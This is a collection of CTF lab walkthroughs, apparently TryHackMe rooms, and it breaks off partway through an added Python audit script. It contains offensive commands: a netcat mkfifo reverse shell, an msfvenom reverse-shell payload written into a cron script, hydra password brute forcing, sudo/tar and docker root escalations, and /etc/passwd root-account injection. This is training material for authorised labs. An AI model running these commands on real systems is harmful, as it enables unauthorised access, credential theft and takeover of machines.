- There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
- Search on Google `Bolt RCE Exploit DB`
- `***2*`
- Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
- `msfconsole`
- `search bolt`
- `use *`
- `exploit/unix/******************************`
- Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
no answer needed
- `set LHOST <YOUR_IP>`
- `set LPORT 1234`
- `set RHOST <TARGET_IP>`
- `set USERNAME bolt`
- `set PASSWORD ************`
- Look for flag.txt inside the machine.
- `exploit`
- `cat $(find / -name flag.txt 2>/dev/null)`
- `THM{***************************}`
================================================
FILE: Bounty-Hacker/README.md
================================================
# Bounty Hacker
You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
- Deploy the machine.
no answer needed
- Find open ports on the machine
no answer needed
- `nmap -Pn <TARGET_IP>`
- Who wrote the task list?
- `ftp <TARGET_IP>`
- `user`
- `anonymous`
- `recv locks.txt`
- `recv task.txt`
- `cat task.txt`
- `lin`
- What service can you bruteforce with the text file found?
- `ssh`
- What is the users password?
- `hydra -s 22 -v -V -l 'lin' -P locks.txt -t 8 <TARGET_IP> ssh`
- `RedDr4gonSynd1cat3`
- user.txt
- `ssh lin@<TARGET_IP>`, then enter `yes` and the password `RedDr4gonSynd1cat3`
- `ls`
- `cat user.txt`
- `THM{******SyNd1C4T3}`
- root.txt
- Type `sudo -l`, enter the password, and you can see that user lin can run the `tar` command with sudo.
- Search on [GTFObins](https://gtfobins.github.io/) `tar`
- Then search for `sudo`
- Found this: `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`
- Execute this and then `cat /root/root.txt`
- `THM{*************}`
================================================
FILE: Bounty-Hacker/locks.txt
================================================
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
================================================
FILE: Bounty-Hacker/task.txt
================================================
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
================================================
FILE: Brooklyn-Nine-Nine/README.md
================================================
# Brooklyn Nine Nine
- User flag
- `scilla port -p -1000 <TARGET_IP>`
- Three ports open.
- `ftp <TARGET_IP>` with username `anonymous` and no password.
- `get note_to_jake.txt`
- `cat note_to_jake.txt`
- Cool.
- `hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP> -f -VV -t 4`
- `ssh jake@<TARGET_IP>` and enter the password.
- `ls -alh`
- `cd ..`
- `cd holt`
- `ls -lah`
- `cat user.txt`
- `********************************`
- Root flag
- `sudo -l`
- `sudo less /root/root.txt`
- `********************************`
================================================
FILE: Brute-It/README.md
================================================
# Brute It
- Deploy the machine
no answer needed
- How many ports are open?
- `nmap -p- <TARGET_IP>` or
- `scilla port -target <TARGET_IP>`
- `2`
- What version of SSH is running?
- `nmap -sS -sV -Pn -p 22 <TARGET_IP>`
- `OpenSSH 7.6p1`
- What version of Apache is running?
- `nmap -sS -sV -Pn -p 80 <TARGET_IP>`
- `2.*.**`
- Which Linux distribution is running?
- `Ubuntu`
- What is the hidden directory?
- `scilla dir -target <TARGET_IP>`
- `/admin`
- What is the user:password of the admin panel?
- `hydra -l admin -P /usr/share/wordlists/rockyou.txt <TARGET_IP> http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" -f`
- `admin:******`
- What is John's RSA Private Key passphrase?
- `python2 /usr/share/john/ssh2john.py rsa_priv > hash`
- `john --wordlist=/usr/share/wordlists/rockyou.txt hash`
- `**********`
- user.txt
- `chmod 400 rsa_priv` (ssh refuses a private key that other users can read)
- `ssh john@<TARGET_IP> -i rsa_priv` and enter the passphrase
- `cat user.txt`
- `THM{***************************}`
- Web flag
- `THM{********************}`
- What is the root's password?
- `sudo cat /etc/shadow`
- `sudo cat /etc/passwd`
- Copy these two files into your machine
- `unshadow passwd shadow > passwords.txt`
- `john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt`
- `*********`
- root.txt
- `sudo -l`
- https://gtfobins.github.io/gtfobins/cat/
- `sudo cat /root/` :)
================================================
FILE: Burp-Suite/README.md
================================================
# Burp Suite
- Read the overview and continue on into installation!
no answer needed
- If you'll be installing Burp (as it's commonly referred to) from scratch, you'll need to first visit this link: https://portswigger.net/burp/communitydownload
no answer needed
- Once you've reached the Port Swigger downloads page, go ahead and download the appropriate version for your operating system
no answer needed
- Once you've got everything setup move onto our next task, Gettin' [CA] Certified!
no answer needed
- Launch Burp!
no answer needed
- Once this pops-up, click 'Temporary project' and then 'Next'.
no answer needed
- This option is included as it can be incredibly useful to create a custom configuration file for your proxy or other settings, especially depending on your network configuration and/or whether Burp Suite is being launched remotely, such as via X11 forwarding.
no answer needed
- Finally, let's go ahead and Start Burp! Click 'Start Burp' now!
no answer needed
- Since we now have Burp Suite running, the proxy service will have started by default with it. In order to fully leverage this proxy, we'll have to install the CA certificate included with Burp Suite (otherwise we won't be able to load anything with SSL). To do this, let's launch Firefox now!
no answer needed
- Go ahead and install this now!
no answer needed
- Next, we'll move onto adding the certificate for Burp!
no answer needed
- With Firefox, navigate to the following address: http://localhost:8080
no answer needed
- Click on 'CA Certificate' in the top right to download and save the CA Certificate.
no answer needed
- Click on 'View Certificates'
no answer needed
- Next, in the Authorities tab click on 'Import'
no answer needed
- Navigate to where you saved the CA Certificate we downloaded previously. Click 'OK' once you've selected this certificate.
no answer needed
- Select 'OK' once you've done this. Congrats, we've now installed the Burp Suite CA Certificate!
no answer needed
- Which tool in Burp Suite can we use to perform a 'diff' on responses and other pieces of data?
- `Comparer`
- What tool could we use to analyze randomness in different pieces of data such as password reset tokens?
- `Sequencer`
- Which tool can we use to set the scope of our project?
- `Target`
- While only available in the premium versions of Burp Suite, which tool can we use to automatically identify different vulnerabilities in the application we are examining?
- `Scanner`
- Encoding or decoding data can be particularly useful when examining URL parameters or protections on a form, which tool allows us to do just that?
- `Decoder`
- Which tool allows us to redirect our web traffic into Burp for further examination?
- `Proxy`
- Simple in concept but powerful in execution, which tool allows us to reissue requests?
- `Repeater`
- With four modes, which tool in Burp can we use for a variety of purposes such as field fuzzing?
- `Intruder`
- Last but certainly not least, which tool allows us to modify Burp Suite via the addition of extensions?
- `Extender`
- With Burp Suite launched, let's first navigate to the 'User options' tab.
no answer needed
- Next, click on the 'Display' sub-tab.
no answer needed
- Now, click on the 'Look and feel' drop-down menu. Select 'Darcula'.
no answer needed
- Finally, close and relaunch Burp Suite to have dark theme (or whichever theme you picked) take effect.
no answer needed
- Deploy the VM attached to this task!
no answer needed
- By default, the Burp Suite proxy listens on only one interface. What is it? Use the format of IP:PORT
- `127.0.0.1:8080`
- In Burp Suite, navigate to the Intercept sub-tab of the Proxy section. Enable Intercept
no answer needed
- Take a look at the actions, which shortcut allows us to forward the request to Repeater?
- `CTRL-r`
- How about if we wanted to forward our request to Intruder?
- `CTRL-i`
- What is the name of the first section wherein general web requests (GET/POST) are saved?
- `http history`
- What is the name of the second section of our saved history in Burp Suite?
- `websockets history`
- Here we can apply further fine-grained rules to define which requests we would like to intercept. Perhaps the most useful out of the default rules is our only AND rule. What is its match type?
- `url`
- How about its 'Relationship'?
- `is in target scope`
- Before leaving the Proxy tab, switch Intercept to disabled. We'll still see the pages we navigate to in our history and the target tab, just having Intercept constantly stopping our requests for this next bit will get old fast.
no answer needed
- Navigate to the Target tab in Burp. In our last task, Proxy, we browsed to the website on our target machine (in this case OWASP Juice Shop). Find our target site in this list and right-click on it. Select 'Add to scope'.
no answer needed
- Clicking 'Add to scope' will trigger a pop-up. This will stop Burp from sending out-of-scope items to our site map.
no answer needed
- Select 'Yes' to close the popup.
no answer needed
- What do we call this representation of the collective web application?
- `site map`
- What is the term for browsing the application as a normal user prior to examining it further?
- `happy path`
- One last thing before moving on. Within the target tab, you may have noticed a sub-tab for issue definitions. Click into that now.
no answer needed
- Which poisoning issue arises when an application behind a cache processes input that is not included in the cache key?
- `web cache poisoning`
- To start, click 'Account' (this might be 'Login' depending on the version of Juice Shop) in the top right corner of Juice Shop in order to navigate to the login page.
no answer needed
- Try logging in with invalid credentials. What error is generated when login fails?
- `Invalid email or password.`
- But wait, didn't we want to send that request to Repeater? Even though we didn't send it to Repeater initially via intercept, we can still find the request in our history. Switch over to the HTTP sub-tab of Proxy. Look through these requests until you find our failed login attempt. Right-click on this request and send it to Repeater and then send it to Intruder, too!
no answer needed
- Now that we've sent the request to Repeater, let's try adjusting the request such that we are sending a single quote (') as both the email and password. What error is generated from this request?
- `SQLITE_ERROR`
- Now that we've leveraged Repeater to gain proof of concept that Juice Shop's login is vulnerable to SQLi, let's try something a little more mischievous and attempt to leave a devastating zero-star review. First, click on the drawer button in the top-left of the application. If this isn't present for you, just skip to the next question.
no answer needed
- Next, click on 'Customer Feedback' (depending on the version of Juice Shop this also might be along the top of the page next to 'Login' under 'Contact Us')
no answer needed
- With the Burp proxy on, submit feedback. Once this is done, find the POST request in your HTTP History in Burp and send it to Repeater.
no answer needed
- What field do we have to modify in order to submit a zero-star review?
- `rating`
- Submit a zero-star review and complete this challenge in Juice Shop!
no answer needed
- Which attack type allows us to select multiple payload sets (one per position) and iterate through them simultaneously?
- `pitchfork`
- How about the attack type which allows us to use one payload set in every single position we've selected simultaneously?
- `Battering ram`
- Which attack type allows us to select multiple payload sets (one per position) and iterate through all possible combinations?
- `cluster bomb`
- Perhaps the most commonly used, which attack type allows us to cycle through our payload set, putting the next available payload in each position in turn?
- `sniper`
- Download the wordlist attached to this room, this is a shortened version of the fuzzdb SQLi platform detection list.
no answer needed
- Return to the Intruder in Burp. In our previous task, we passed our failed login attempt to both Repeater and Intruder for further examination. Open up the Positions sub-tab in the Intruder tab with this request now and verify that 'Sniper' is selected as our attack type.
no answer needed
- Burp attempts to automatically highlight possible fields of interest for Intruder, however, it doesn't have it quite right for what we'll be looking at in this instance. Hit 'Clear' on the right-hand side to clear all selected fields.
no answer needed
- Next, let's highlight the email field between the double quotes ("). This will be whatever you entered in the email field for our previous failed login attempt.
no answer needed
- Now click 'Add' to select our email field as a position for our payloads.
no answer needed
- Next, let's switch to the payloads sub-tab of Intruder. Once there, hit 'Load' and select the wordlist you previously downloaded in question five that is attached to this task.
no answer needed
- Almost there! Scroll down and uncheck 'URL-encode these characters'. We don't want to have the characters sent in our payloads to be encoded as they otherwise won't be recognized by SQL.
no answer needed
- Finally, click 'Start attack'. What is the first payload that returns a 200 status code, showing that we have successfully bypassed authentication?
- `** ** *****`
- Switch over to the HTTP history sub-tab of Proxy.
no answer needed
- We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header.
no answer needed
- Once you've found a request response that issues a cookie, right-click on the request and select 'Send to Sequencer'.
no answer needed
- Change over Sequencer and select 'Start live capture'
no answer needed
- Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now'
no answer needed
- Parse through the results. What is the effective estimated entropy measured in?
- `bits`
- In order to find the usable bits of entropy we often have to make some adjustments to have a normalized dataset. What item is converted in this process?
- `token`
- Read through the remaining results of the token analysis
no answer needed
- Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request.
no answer needed
- Copy the first line of that request and paste it into Decoder. Next, select 'Decode as ...' URL
no answer needed
- What character does the %20 in the request we copied into Decoder decode as?
- `space`
- Similar to CyberChef, Decoder also has a 'Magic' mode where it will automatically attempt to decode the input it is provided. What is this mode called?
- `smart decode`
- What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues.
- `site maps`
- Comparer can perform a diff against two different metrics, which one allows us to examine the data loaded in as-is rather than breaking it down into bytes?
- `words`
- To start, let's go ahead and switch over to the Options sub-tab of the Extender tab.
no answer needed
- Scroll down until you reach the 'Python Environment' section. Note, Burp requires the standalone edition of Jython.
no answer needed
- Download the standalone version of Jython from here: [Link](https://www.jython.org/download.html) - I suggest saving this or moving it to your Documents folder
no answer needed
- Return back to Burp and hit 'Select file' under the Python Environment subsection for Jython standalone. Navigate to where you just downloaded this file and select it.
no answer needed
- Burp is now set to go for installing extensions. Switch to the BApp Store sub-tab of Extender and look through the various extensions offered.
no answer needed
- Which extension allows us to bookmark various requests?
- `bookmarks`
- Download the report attached to this task. What is the only critical issue?
- `Cross-origin resource sharing: arbitrary origin trusted`
- How many 'Certain' low issues did Burp find?
- `12`
- Check out the provided links and keep learning!
no answer needed
================================================
FILE: CC:-Radare2/README.md
================================================
# CC: Radare2
- Read the above
no answer needed
- What flag do you set to analyze the binary upon entering the r2 console (equivalent to running aaa once you're inside the console)?
- `-a`
- How do you enable the debugger?
- `-d`
- How do you open the file in write mode?
- `-w`
- How do you enter the console without opening a file?
- `-`
- What command "Analyzes Everything" (all functions and their arguments; same as running radare with -A)?
- `aaa`
- What command does basic analysis on functions?
- `af`
- How do you list all functions?
- `afl`
- How many functions are in the example1 binary?
- `r2 -d example1`
- `aaa`
- `afl`
- `12`
- What is the name of the secret function in the example1 binary?
- `secret_func`
- What command shows all the information about the file that you're in?
- `iA`
- How do you get every string that is present in the binary?
- `izz`
- What if you want the address of the main function?
- `iM`
- What character do you add to the end of every command to get the output in JSON format?
- `j`
- How do you get the entrypoint of the file?
- `ie`
- What is the secret string hidden in the example2 binary?
- `r2 -d example2`
- `aaa`
- `izz`
- `*******`
- How do you print out the current memory address you're located at in the binary?
- `s`
- What command do you use to go to a specific point in memory with the syntax `<command> <address>`?
- `s`
- What command would you run to go 5 bytes forward?
- `s+ 5`
- What about 12 bytes backward?
- `s- 12`
- How do you undo the previous seek?
- `s-`
- How would you go to the memory address of the main function?
- `s main`
- What if you wanted to go to the address of the rax register?
- `sr rax`
- Play around with the s command in the example1 and example2 binaries
no answer needed
- How would you print the hex output of where you currently are in memory?
- `px`
- How would you print the disassembly of where you're currently at in memory?
- `pd`
- What if you wanted the disassembly of the main function?
- `pd f main`
- What command prints out the emoji hexdump? (this is not useful at all I just find it funny)
- `pxe`
- What if you decided you were too good for rows and you wanted the disassembly in column format?
- `pc`
- What is the value of the first variable in the main function for the example 3 binary?
- `r2 -d example3`
- `aaa`
- `pdf @ main`
- `1`
- What about the second variable?
- `5`
- How many functions are in the binary?
- `r2 -d midterm`
- `aaa`
- `afl`
- `13`
- What is the value of the hidden string?
- `izz`
- `you*******me`
- What is the return value of `secret_func()`?
- `pdf @ sym.secret_func`
- `4`
- What is the value of the first variable set in the main function (in decimal format)?
- `pdf @ main`
- `12`
- What about the second one (also in decimal format)?
- `192`
- What is the next function in memory after the main function?
- `afl`
- `*******_func`
- How do you get a hexdump of four bytes of the memory address you're currently at?
- `px 2`
- How do you set a breakpoint?
- `db`
- What command is used to print out the values of all the registers?
- `dr`
- How do you run through the program until the program either ends or you hit the next breakpoint?
- `dc`
- What if you want to step through the binary one line at a time?
- `ds`
- How do you go forth 2 lines in the binary?
- `ds 2`
- How do you list out the indexes and memory addresses of all breakpoints?
- `dbi`
- Go back through all previous binaries and mess around with debug mode.
no answer needed
- How do you enter "graph mode", which allows everything to be organized in nice readable boxes? (A personal favorite of mine. Also note that the second character is uppercase)
- `vV`
- What character do you press to run normal radare commands inside visual mode?
- `:`
- How do you go back to the regular radare shell (leaving visual mode)?
- `q`
- What if you want to step through the binary inside Visual mode?
- `s`
- How do you add a comment?
- `;`
- Look through any of the binaries in Visual Mode and see just how much more beautiful everything looks.
no answer needed
- How do you write a string to the current memory address?
- `w`
- What command lists all write changes?
- `wc`
- What command modifies an instruction at the current memory address?
- `wa`
- Get the example4 binary to show the You win! message
no answer needed
- What is the password that outputs the you win! message?
- `r2 -d the_final_exam`
- `aaa`
- `afl`
- `pdf @ main`
- `pdf @ sym.get_password`
- `db 0x5635b2cf682f`
- `dc`
- `edordottt`
- `dr`
- `s 0xffffffffffffffda`
- `px 10`
- `onykbnyddd`
- So it's ROT-10
- `********`
================================================
FILE: CTF-collection-Vol.1/README.md
================================================
# CTF collection Vol.1
- High five!
no answer needed
- Feed me the flag!
- `echo "VEhNe2p1NTdfZDNjMGQzXzdoM19iNDUzfQ==" | base64 -d`
- `THM{********************}`
- I'm hungry, I need the flag.
- `exiftool Findme.jpg`
- `THM{************}`
- It is sad. Feed me the flag.
- `steghide info Extinction.jpg` and then `y`
- `steghide extract -sf Extinction.jpg` and then enter (without passphrase)
- `cat Final_messge.txt`
- `THM{********************************}`
- Did you find the flag?
- Highlight the text or check the page source code.
- `THM{**********}`
- More flag please!
- Download the image and check the QR code.
- `THM{*****************}`
- Found the flag?
- `strings hello.hello | grep THM`
- `THM{******************}`
- Oh, Oh, Did you get it?
- Visit [CyberChef](https://gchq.github.io/CyberChef)
- Recipe from Base58
- `THM{*********************}`
- What did you get?
- Caesar Cipher (19)
- `THM{***************}`
- I'm hungry now... I need the flag
- Check the HTML source code
- `THM{***********************}`
- What is the content?
- `xxd --plain spoil.png > hex.txt`
- Replace the first 8 characters with `89504E47`
- Go to CyberChef; the recipe is `From Hex` and then `Render Image`.
- `THM{**********}`
- Did you find the hidden flag?
- Just search `Tryhackme reddit`
- `THM{********************************}`
- Can you decode it?
- Search on Google for BinaryFuck Interpreter
- `THM{**********}`
- Did you crack it? Feed me now!
- [XOR Calculator](http://xor.pw/#) and output as ASCII.
- `THM{************}`
- Flag! Flag! Flag!
- `binwalk hell.jpg -e`
- `cd _hell.jpg.extracted`
- `cat hello_there.txt`
- `THM{****************}`
- What does the flag say?
- `wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar`
- `chmod +x stegsolve.jar`
- `./stegsolve.jar`
- Open the dark.png file and try to see the flag with the arrows.
- `THM{**********************}`
- What does the bot say?
- Follow the link on the QR code and play the track.
- `THM{**********}`
- Did you find my past?
- Use wayback (https://web.archive.org/web/20200102131252/https://www.embeddedhacker.com/)
- Load the snapshot on Jan 2, 2020.
- Search for string `THM{` on the page.
- `THM{******************}`
- The deciphered text
- Input `MYKAHODTQ{RVG_YVGGK_FAL_WXF}` in [CyberChef](https://gchq.github.io/CyberChef/) with recipe Vigenere Decode and key=TRYHACKME.
- Output is `THMTHMTHM{*****************}`
- Change the key to `THMTHMTHM`
- `TRYHACKME{*****************}`
- What is the flag?
- `python3`
- `n = 581695969015253365094191591547859387620042736036246486373595515576333693`
- `h = hex(n)[2:]`
- `bytearray.fromhex(h).decode()`
- `THM{***********************}`
- Did you capture my neighbor's flag?
- Open the file with Wireshark.
- `THM{****************}`
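Three of the decoding steps in this room (the Vigenère decode with CyberChef, the big integer turned back into ASCII in the Python REPL, and the hand-patched PNG header of spoil.png) can be scripted. The following is an added Python example, not part of this writeup or of the room; the function names are my own, and the values in its self-test are constructed rather than the room's files or flags.

```python
import string

PNG_SIGNATURE = bytes.fromhex("89504E470D0A1A0A")  # fixed 8-byte header of every PNG


def vigenere_decode(ciphertext: str, key: str) -> str:
    """Decode the way CyberChef's 'Vigenere Decode' does: only ASCII letters are
    shifted, and any other character is copied through without consuming a key
    letter (so '{' and '_' in the room's ciphertext do not desync the key)."""
    shifts = [ord(k) - ord("A") for k in key.upper() if k in string.ascii_uppercase]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, i = [], 0
    for ch in ciphertext:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shifts[i % len(shifts)]) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def int_to_text(n: int, encoding: str = "ascii") -> str:
    """Unpack a flag stored as one big integer (big-endian bytes). Same idea as
    hex(n)[2:] + bytearray.fromhex() in the writeup, but to_bytes() also handles
    an odd-length hex string (top nibble below 0x10), which fromhex() rejects."""
    if n <= 0:
        raise ValueError("expected a positive integer")
    return n.to_bytes((n.bit_length() + 7) // 8, "big").decode(encoding)


def is_png(data: bytes) -> bool:
    return data.startswith(PNG_SIGNATURE)


def repair_png_header(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the PNG signature. The writeup patches
    only the first 4 bytes (8 hex characters); bytes 4..7 are constant in every
    valid PNG, so rewriting all 8 is safe and also covers a fully wiped header."""
    if len(data) < len(PNG_SIGNATURE):
        raise ValueError("too short to be a PNG")
    return PNG_SIGNATURE + data[len(PNG_SIGNATURE):]


if __name__ == "__main__":
    # Constructed samples, not the room's files or flags.
    print(vigenere_decode("RIJVS", "KEY"))  # HELLO
    n = int.from_bytes(b"THM{constructed_sample}", "big")
    print(n, "->", int_to_text(n))
    broken = b"\x00" * 8 + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 13
    print("is_png before:", is_png(broken), "after:", is_png(repair_png_header(broken)))
```

Running `vigenere_decode` on the room's ciphertext with the key `TRYHACKME` gives the `THMTHMTHM{...}` prefix noted above, and with `THMTHMTHM` the `TRYHACKME{...}` one; a single-letter key is just a Caesar shift, so the same function covers the Caesar (19) step as well.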
================================================
FILE: Chill-Hack/README.md
================================================
# Chill Hack
- User Flag
- `scilla port -target <TARGET_IP> -p -1000`
- `ftp <TARGET_IP>`
- `anonymous`, no password
- `get note.txt`
- `scilla dir -target <TARGET_IP>`
- secret directory found.
- Execute `cat /etc/passwd`: the command is filtered. ahahhahahahahahahhaa.
- So, execute `cat</etc/passwd`
- `nc -lnvp 1234`
- `r"m" /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 1234 >/tmp/f`
- Cool.
- `python3 -c 'import pty;pty.spawn("/bin/bash")'`
- `cd /home`
- `sudo -l`
- `cd apaar`
- `sudo -u apaar /home/apaar/.helpline.sh`
- `/bin/sh` and `/bin/sh`
- `id`
- `cat local.txt`
- `{USER-FLAG: *********************************}`
- Root Flag
- `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
- `python3 -m http.server`
- On target `curl <YOUR_IP>:8000/LinEnum.sh > linenum.sh`
- `chmod +x linenum.sh`
- `./linenum.sh`
~~~
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
~~~
- On your machine `ssh-keygen`
- `cd ~/.ssh`
- `python3 -m http.server`
- On target `curl <YOUR_IP>:8000/id_rsa.pub > ~/.ssh/authorized_keys`
- `chmod 600 id_rsa`
- `ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@<TARGET_IP>`
- `cat /var/www/files/index.php`
- Found username and password for MySQL database.
- `mysql -u root -p` and enter the password found.
- `show databases;`
- `use webportal;`
- `show tables;`
- `select * from users;`
- Save those two hashes
- `john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
- Log in to the website at localhost:9001
- Download the image and execute `steghide extract -sf hacker-with-laptop_23-2147985341.jpg`
- `fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip`
- Inspect `source_code.php`
- `echo ******************** | base64 -d`
- `su anurodh` and enter password
- `docker images`
- `docker run -v /root:/mnt -it alpine`
- `cat /mnt/proof.txt`
- `{ROOT-FLAG: ********************************}`
================================================
FILE: Common-Linux-Privesc/README.md
================================================
# Common Linux Privesc
- Deploy the machine
no answer needed
- Read the information about privilege escalation
no answer needed
- Understand the difference between Horizontal and Vertical privilege escalation.
no answer needed
- First, let's SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
- `ssh user3@<TARGET_IP>`, enter `yes` and the password.
- On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
- On your machine `sudo python3 -m http.server`
- On target `wget http://<YOUR_IP>:8000/LinEnum.sh`
- `chmod +x LinEnum.sh`
- `./LinEnum.sh`
- What is the target's hostname?
- `polobox`
- Look at the output of /etc/passwd how many "user[x]" are there on the system?
- `8`
- How many available shells are there on the system?
- `4`
- What is the name of the bash script that is set to run every 5 minutes by cron?
- `autoscript.sh`
- What critical file has had its permissions changed to allow some users to write to it?
- `/etc/passwd`
- Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!
no answer needed
- What is the path of the file in user3's directory that stands out to you?
- `/home/user3/shell`
- We know that "shell" is an SUID bit file, therefore running it will run the script as a root user! Let's run it! We can do this by running: "./shell"
no answer needed
- Congratulations! You should now have a shell as root user, well done!
no answer needed
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user7, with the password "password"
no answer needed
- Having read the information above, what direction privilege escalation is this attack?
- `vertical`
- Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: "openssl passwd -1 -salt [salt] [password]" What is the hash created by using this command with the salt, "new" and the password "123"?
- `***********************`
- Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username "new" and the password hash we created before?
- Read the hint
- `*************************************************`
- Great! Now you've got everything you need. Just add that entry to the end of the /etc/passwd file!
no answer needed
- Now, use "su" to login as the "new" account, and then enter the password. If you've done everything correctly, you should be greeted by a root prompt! Congratulations!
no answer needed
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user8, with the password "password"
no answer needed
- Let's use the "sudo -l" command, what does this user require (or not require) to run vi as root?
- `NOPASSWD`
- So, all we need to do is open vi as root, by typing "sudo vi" into the terminal.
no answer needed
- Now, type ":!sh" to open a shell!
no answer needed
- First, let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user4, with the password "password"
no answer needed
- Now, on our host machine, let's create a payload for our cron exploit using msfvenom.
no answer needed
- What is the flag to specify a payload in msfvenom?
- `-p`
- Create a payload using: `msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R`
no answer needed
- What directory is the "autoscript.sh" under?
- `/home/user4/Desktop`
- Let's replace the contents of the file with our payload using: "echo [MSFVENOM OUTPUT] > autoscript.sh"
no answer needed
- After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: "nc -lvp 8888" and wait for our shell to land!
no answer needed
- After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!
no answer needed
- Going back to our local SSH session (not the netcat root session, which you can close now), let's exit out of root from our previous task by typing "exit". Then use "su" to swap to user5, with the password "password"
no answer needed
- Let's go to user5's home directory, and run the file "script". What command do we think that it's executing?
- `ls`
- Now we know what command to imitate, let's change directory to "tmp".
no answer needed
- Now we're inside tmp, let's create an imitation executable. The format for what we want to do is: echo "[whatever command we want to run]" > [name of the executable we're imitating]. What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating?
- `echo "/bin/bash" > ls`
- Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?
- `chmod +x ls`
- Now, we need to change the PATH variable, so that it points to the directory where we have our imitation "ls" stored! We do this using the command "export PATH=/tmp:$PATH". Note, this will cause you to open a bash prompt every time you use "ls". If you need to use "ls" before you finish the exploit, use "/bin/ls" where the real "ls" executable is. Once you've finished the exploit, you can exit out of root and use "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH" to reset the PATH variable back to default, letting you use "ls" again!
no answer needed
- Now, change directory back to user5's home directory.
no answer needed
- Now, run the "script" file again, you should be sent into a root bash prompt! Congratulations!
no answer needed
- Well done, you did it!
no answer needed
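Both techniques in this task come down to the same mistake: root executes something an unprivileged user controls, either a cron job whose script is writable or a SUID script that calls `ls` by bare name under an inherited PATH. The Python script below is an added example, not part of the room or of this repository. It audits a system crontab for jobs whose program file the current user can write to, and it reproduces the PATH hijack in a throwaway directory (an imitation `ls` that prints a marker instead of spawning a shell) to show that the bare command resolves to the attacker's copy and that resetting PATH inside the privileged script defeats it. The crontab lines, paths and the `autoscript.sh` name used here are constructed for the demo.

```python
#!/usr/bin/env python3
"""Added example: the two privesc checks from this task, cron targets and PATH hijack."""
import os
import shlex
import subprocess
import tempfile

# Constructed sample in /etc/crontab format (m h dom mon dow user command); paths are made up.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * *     root    /home/user4/Desktop/autoscript.sh
@reboot         root    /opt/backup.sh
"""


def cron_commands(crontab_text):
    """Yield (user, command) for each job line of a system crontab.

    Blank lines, comments and VAR=value lines are skipped; @reboot-style
    schedules are handled as well as the five numeric time fields.
    """
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)      # 5 time fields, user, rest of the line
        if "=" in fields[0]:              # environment assignment such as PATH=
            continue
        if fields[0].startswith("@"):     # @reboot user command
            if len(fields) >= 3:
                yield fields[1], " ".join(fields[2:])
            continue
        if len(fields) == 7:
            yield fields[5], fields[6]


def first_program(command):
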